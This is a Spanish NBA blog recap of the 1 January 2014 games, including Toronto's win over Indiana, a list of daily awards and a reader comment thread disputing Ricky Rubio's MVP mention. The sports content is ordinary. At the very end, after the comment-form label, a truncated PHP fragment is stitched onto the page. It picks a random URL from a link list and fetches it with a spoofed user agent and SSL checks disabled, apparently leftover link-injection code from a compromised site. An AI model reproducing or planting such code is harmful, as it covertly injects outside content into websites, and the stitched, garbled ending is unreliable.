La Crónica: Toronto imparable

02 de January de 2014 por Simon

La primera jornada del año en la NBA llegaba con 5 partidos que nos han acabado dejando como novedad principal un nuevo empate en la cabeza de la liga tras la derrota de Indiana en Toronto. Desde la marcha de Gay, los Raptors están imparables y acumulan un récord de 9 victorias por tan sólo 3 derrotas que les sitúa en estos momentos en la cuarta plaza de la conferencia este. Anoche fue sólo una muestra más del nivel de juego que están alcanzando los canadienses y es que fueron capaces de vencer a Indiana en un partido duro y físico de esos que tanto les gusta a los de Frank Vogel. El gran número de pérdidas y la alta cantidad de faltas fue lo que más pesó en el juego de los visitantes que vieron como Hibbert tenía que dejar el encuentro tres minutos y medio antes del final eliminado por faltas. A falta de 7 minutos el marcador estaba igualado a 74 pero Toronto consiguió un parcial de 14-3 liderados oor DeRozan con 8 puntos que dejó el partido sentenciado para los locales (82-95). Mención especial en la victoria a Lowry y DeRozan que, sobre todo el primero, han elevado su nivel de juego exponencialmente desde que no está Rudy Gay. Con la victoria de ayer los Raptors consiguieron adelantar a Washington Wizards que perdieron en su casa ante Dallas Mavericks en un partido de escaso acierto por ambas partes. Sólo en los últimos 5 minutos Dallas encontró el acierto necesario para derrotar a los Wizards a pesar del peor partido de la temporada de Dirk Nowitzki (87-78). 

Aunque la ventaja de los Mavericks es grande, la jornada de ayer era importante para ellos porque se enfrentaban sus dos inmediatos perseguidores. Los Pelicans, que venían de conseguir una importante victoria en el último segundo ante Portland, visitaban el Target Center con la clara intención de llevarse una victoria que los hubiese permitido adelantar a los Wolves en la clasificación y situarse novenos. Sin embargo, los de Adelman no dieron ninguna opción ya que vivieron una de sus mejores noches en ataque en lo que va de temporada con hasta 6 jugadores en dobles dígitos. Por momentos los Wolves tuvieron ventajas que rozaron los 30 puntos pero un gran último cuarto de Pelicans les permitió maquillar el resultado (112-124). Otro partido que no tuvo historia alguna fue el Clippers contra Charlotte que terminó 85-112 a pesar de una primera parte igualada que terminó, increíblemente visto el resultado final, con ventaja para los Bobcats. Para terminar la jornada, los Sixers sorprendieron a Denver en su casa y se llevaron su tercera victoria seguida, segunda a domicilio, gracias a un gran acierto de todos sus titulares (114-102). Con esta, van 8 derrotas para unos Denver Nuggets que han pasado de estar acomodados en Play Off a estar más cerca del último del Oeste que de la lucha por el título en apenas 20 días.

PREMIOS

MVP: Blake Grifin y Chris Paul se dieron un festín con los Bobcats apenas un par de días después de aparecer en el apartado de “Decepción”. 31 puntos, 12 rebotes para el ala-pívot y 17 puntos, 14 asistencias para el base. Ricky Rubio jugó uno de sus mejores partidos del año y se quedó a nada del triple doble. Acabó con 14 puntos, 9 asistencias, 8 rebotes y aún robó 3 balones y puso 2 tapones.

Rookie: Michael Carter-Williams completó uno de sus típicas hojas estadísticas. 16 puntos, 9 rebotes, 6 asistencias y 2 robos.

Sorpresa: Trevor Booker capturó 19 rebotes antes los Mavs en apenas 30 minutos. No debió dejar muchos a los compañeros. Jared Dudley dejó la mediocridad en la que parece instalado este año para anotar 20 puntos con un 6 de 9 en triples.

Decepción: Dirk Nowitzki sólo anotó 3 de sus 14 lanzamientos a canasta y no llegó a la decena de puntos. Paul George falló 9 de sus 14 lanzamientos y además perdió 6 balones.

Esfuerzo en vano: Ryan Anderson fue el mejor de los Pelicans con 25 puntos pero no pudo hacer nada ante el huracán de los Wolves.

TOP-10:

Imágenes | AP Photos / Getty Images

Comenta

19 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    El gran beneficiado de que los Nuggets se desplomen y mientras los Knicks sigan así como están es Orlando,que podría recoger en sus manos dos lottery picks,el suyo propio y el peor entre Denver y New York.Con lo que tienen,lo que les llegaría en el draft y lo que podrán pescar están en disposición de crear un potencial tercer equipo del este por detrás de Miami e Indiana.

    No deja de ser significativo el balance de los Raptors tras el traspaso de Rudy Gay,aunque sinceramente pensaba que iban a transmitir mejores sensaciones pero que estas no se traducirían en forma de resultados.Estaba cantado que iban a involucrar mucho más a Valanciunas en el juego y ya luego,darle más importancia al resto de los integrantes del equipo,se ve que lo ha mejorado como tal,aunque está claro que el bajo nivel de la división y el bajo nivel de la conferencia ayudan.

      Citar

  2. Esteban dice:
    #2

    ricky rubio en esta pagina tiene como 4 apariciones en el apartado MVP, debe ser uno de los 10 jugadores con mas apariciones en el MVP jajaja increible no? digo no, siendo la temproada tanto suya como de su equipo tan decepcionante

      Citar

  3. TheDeerHunter dice:
    #3

    Eso es una chorrada como un piano, y una falta de respeto al compañero Simon y al resto del blog (¿incluido a ti mismo?)
    Si a ti te parece que no merece la mención de hoy dilo y arguméntalo, pero no aludas a estadísticas inventadas para insinuar un estúpido trato partidista… que a nadie se le ocurre nada más que a ti. Eso es lo increíble, Esteban.

    Más te valdría quizás reconocer tus propias animadversiones y comentar un poco la temporadita de Griffin y lo equivocado que estabas en ese aspecto. Será que también estamos conspirando en tu contra en ese sentido.

      Citar

  4. Esteban dice:
    #4

    TheDeerHunter:
    Eso es una chorrada como un piano, y una falta de respeto al compañero Simon y al resto del blog (¿incluido a ti mismo?)
    Si a ti te parece que no merece la mención de hoy dilo y arguméntalo, pero no aludas a estadísticas inventadas para insinuar un estúpido trato partidista… que a nadie se le ocurre nada más que a ti. Eso es lo increíble, Esteban.

    Más te valdría quizás reconocer tus propias animadversiones y comentar un poco la temporadita de Griffin y lo equivocado que estabas en ese aspecto. Será que también estamos conspirando en tu contra en ese sentido.

    los clippers estan donde yo creo y dije que iban a estar de a momento,
    griffin lejisimo de Love? no lo qije para no sonar oportunistas, pero alguien aquí dijo que era mejor que Love,
    hoy por hoy hasta Aldrigue esta delante suyo en la carrera al all-star

    No veo nada nuevo en Girffin para llevar a su equipo a la cima de la conferencia, de a momento no me siento equivocado, su balance 22-12 esta a la altura de lo que mi analisis decia, mientras que grffin mejoro su hoja estadistica en base a una cantidad mayor de minuto, mira la estadistica de cada 36 minutos y no veras un progeso

    sobre rubio, esta bien que se quiera recalcarlo sobretodo cuando hace un buen juego, pero eso, yo preferiria ponerlo en la cronica y no en el apartado de MVP, por
    hoy estan en el lote del 4 al 6to con los rockets y golden state, fue lo que dije

    sobre griffin nadie a

      Citar

  5. Esteban dice:
    #5

    que como sabemos, al final de temporada contamos la cantidad de menciones que recibe un jugador, y hoy Ricky Rubio tiene una cantidad de menciones como MVP que no se condice con su realidad individual, ni con la realidad de su equipo fuera de PO

      Citar

  6. TheDeerHunter dice:
    #6

    Chico, la mitad de las veces no me entero bien de lo que respondes. Así que medio interpretaré…

    Sobre Ricky, sinceramente no llevo la cuenta de sus menciones y mi impresión sobre cómo nos comportamos aquí con él es muy distinta a la tuya. Se le critica cuando se debe y se le resalta en la misma línea.
    Me suena otra ocasión más en la que le mencionamos como MVP de la jornada y estoy seguro que, como hoy la merecía. De hecho, en la propia ESPN también lo resaltan como uno de los 3 top performers, con toda la lógica del mundo: http://scores.espn.go.com/nba/scoreboard?date=20140101

    Si aplicas coherencia a tu comentario, igual a Love y a muchos otros de la conferencia Este no habría que mencionarlos por el balance de sus equipos. En este caso ya te informo que ese nunca ha sido el criterio que aplicamos para las menciones diarias. Sí debe de serlo para la carrera por el MVP.

    De Griffin… para no ver nada nuevo en su juego lo único exigible es no tener ojos, o no haber visto ni un puñetero video suyo (ya no digo un partido)… o, también perfectamente posible, tener una capacidad de negación de la realidad que ni nuestros políticos. Y no voy a dar más pistas al respecto hasta final de curso, donde me explayaré como es debido. Todo está ahí para quien lo quiera ver. Yo tengo la costumbre de no fijarme sólo en la estadística para hablar de un jugador.
    Simplemente añadir que la cuestión no era si era mejor o no que Love o Aldridge (que está muy por encima de las espectativas) Sino si era un “segunda espada” válido para un equipo con aspiraciones al anillo.
    Estamos hablando ahora mismo del 11º anotador de la liga (¿2ª espada loquéee?) estando sólo LeBron por delante en relación al aprovechamiento de sus lanzamientos… o dicho de otro modo, lanzando menos que casi todos y anotando más.
    Respecto a ambos temas, como se suele decir… volveré.

      Citar

  7. Esteban dice:
    #7

    Justamente por eso prefiero no hablar de los clippers, por q hoy por hoy estan dode m analisis los ponia, y eso es lejos de ser campeones, pero es solo por hoy, como se dice, las cosas se ven en el final

      Citar

  8. Rompe dice:
    #8

    Al hilo de la discusión, y como suelo llevar el conteo de los premios que se dan diariamente, os diré que Ricky Rubio, con el de hoy, lleva dos nominaciones al MVP…

      Citar

  9. Nacho dice:
    #9

    Esteban hablando de Ricky y Griffin… déjà vu?, 2013 aún… no … por favor.
    Hace dos días se le daba cera a Ricky entre comentaristas del blog (vale que no es lo mismo que crónicas), y cada uno tenemos nuestras filias y fobias.
    Esteban, en serio, mola leerte (sobre todo si te esmeras en cuidar la “letra”), pero a veces te puede tu personaje, Mola también cuando nos tiramos trastos, pero nos pasamos cuando nos empecinamos.
    Sobre Ricky y el blog:
    Tu comentario, por si sólo se podría ver como una critica normal, pero os que llevamos leyéndote adivinamos el dardo.
    Voy a hablar desde la trinchera contraria a la tuya, porque yo soy de Ricky. Y no porque, de momento, seamos del mismo país (aunque eso puede influir, como que me mole más ginobili por argentino que si fuese ucranio. Tenemos simpatías or jugadores y por nacionalidades sin saber por qué), si no por que me mola su juego. Punto. Hay jugadores que te suben la moral viéndolos, aunque las estadísticas (frías e injustas muchas veces) digan que hay otros mejores.
    No se si conoces el Marca, Esteban. Diario deportivo madridista y españolista a más no poder, tratan a Ricky como superMegaGuay estrellla, pues hasta ellos se han quedado cortos algunas veces con lo que se dice desde Minnesota. Este año he visto poca NBA, pero el año pasado vi ponerse en pie el pabellón con Ricky, aplaudiédole y gritándole, porque este chico transmite algo. Y algunos lo vemos, y nos mola. Xavi Pascual y tro no lo hacen/hacéis

      Citar

  10. TheDeerHunter dice:
    #10

    Rompe:
    Al hilo de la discusión, y como suelo llevar el conteo de los premios que se dan diariamente, os diré que Ricky Rubio, con el de hoy, lleva dos nominaciones al MVP…

    Justo lo que creía, pero no estaba seguro.

      Citar

  11. Nacho dice:
    #11

    El final del comentario era:
    Xavi Pascual y otros no lo hacen/hacéis, cada cual tiene sus gustos.

      Citar

  12. txusma dice:
    #12

    Si 14 puntos, 9 rebotes, 8 asistencias, robos y 2 tapones no merecen una mención en el MVP (por detrás de Griffin y Paul, además) no se que lo merece. Si lo hubiera hecho Curry seguro que no habría ningún problema.

      Citar

  13. Esteban dice:
    #13

    Rompe:
    Al hilo de la discusión, y como suelo llevar el conteo de los premios que se dan diariamente, os diré que Ricky Rubio, con el de hoy, lleva dos nominaciones al MVP…

    yo he visto 3 que recuerdo perfectamente en este momento, pero me da la espina que lleva al menos 4 por una memoria pasajera que no puedo afirmar, y me parecen injustas todas,

    lo de gustos sobre ricky tiene todo el sentido del mundo, como dije si hizo un buen partido, me parece de coña ponerlo en la cronica y que hablemos de ello, pero darle el premio de MVP realmente no es justo, mas para quien vio el “partido” (increiblemente lo transmitieron en directo a la argentina), donde se pudo ver una diferencia abismal de nivel, con unos Wolves 30 puntos por encima promediando el tercer cuarto

    ricky jugo bien al nivel del resto de sus compañeros no siendo decisivo en un partido que no tuvo historia

    pero como queráis, denle una mención de MVP a ricky por la paliza que le dieron a los Pelicans, y no a DeRozan o Lowry en la increíble y sorpresiva victoria sobre los Pacers

    cuestión de gustos como bien dicen

      Citar

  14. Esteban dice:
    #14

    txusma:
    Si 14 puntos, 9 rebotes, 8 asistencias,robos y 2 tapones no merecen una mención en el MVP (por detrás de Griffin y Paul, además) no se que lo merece. Si lo hubiera hecho Curry seguro que no habría ningún problema.

    eso significa que Rubio fue mas importante en la Victoria de los Wolves frente a los Pelicans, que Derozan (26 y 9) y/o Lowry en la victoria frente a los Pacers? entiendo por el MVP al jugador mas valioso de la jornada o que mas tuvo que ver en la victoria de su equipo, créeme, por mas estadisticas que haga ricky, ayer no hubo juego en cual ser valioso, los Pelicans abollaron el aro una y otra vez (Gordon incluso lanzando air balls), tomando incluso buenos tiros

    en fin, la temporada pasa y los Wolves siguen fuera de PO, y esta año muchas excusas no quedan

      Citar

  15. Schize dice:
    #15

    Esteban, si te damos todos la razón y decimos que en este blog estamos cegados por nuestra españolitis crónica, ¿dejarás estar el tema y no lo volverás a sacar? Es que cansa tío.

      Citar

  16. Esteban dice:
    #16

    Schize:
    Esteban, si te damos todos la razón y decimos que en este blog estamos cegados por nuestra españolitis crónica, ¿dejarás estar el tema y no lo volverás a sacar? Es que cansa tío.

    bueno, si cansa no entiendo por que siguen respondiendo unos y otros al primer comentario, lo hubiesen dejado pasar, mas aun cuando no tengo nada de razon, pero por algun motivo todos contestan

    en fin, no es para tanto, fue buen partido el de ricky ayer y el de los wolves en general, ojala lo repitan mas seguido puesto que me gustaria verlos en PO

      Citar

  17. TheDeerHunter dice:
    #17

    A mí ni me cansa más ni me cansa menos. Lo que no me mola es el troleo puro y duro.

    Si entras y dices que viste el partido y que no te pareció que su aportación fuera decisiva en el resultado a mí me hubiera parecido correctísimo. De haberte replicado lo hubiera hecho en relación a tu argumento, estando de acuerdo o no, y nada más.

    En cambio vuelves a generalizar, como si aquí todo el mundo tuviera la misma opinión o no tuvieras las oportunidades que quieras de escribir los comentarios o artículos que te plazcan. Insistes en tu absurda acusación de chauvinismo, manipulación y vas más allá… inventándote recuentos que no son y poniendo en duda la honestidad misma de los compañeros. Ese camino no mola… pero tú mismo.

      Citar

  18. Lucho dice:
    #18

    Hablando de los Raptors (por el nombre de la crónica, no por el debate que se armo):
    arumores trade Afflalo-Terrence Ross

      Citar

  19. Blade Petrovic dice:
    #19

    Hombre Ricky fue nombrado con el statofthenight por la NBA, así que creo que el MVP es justo

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>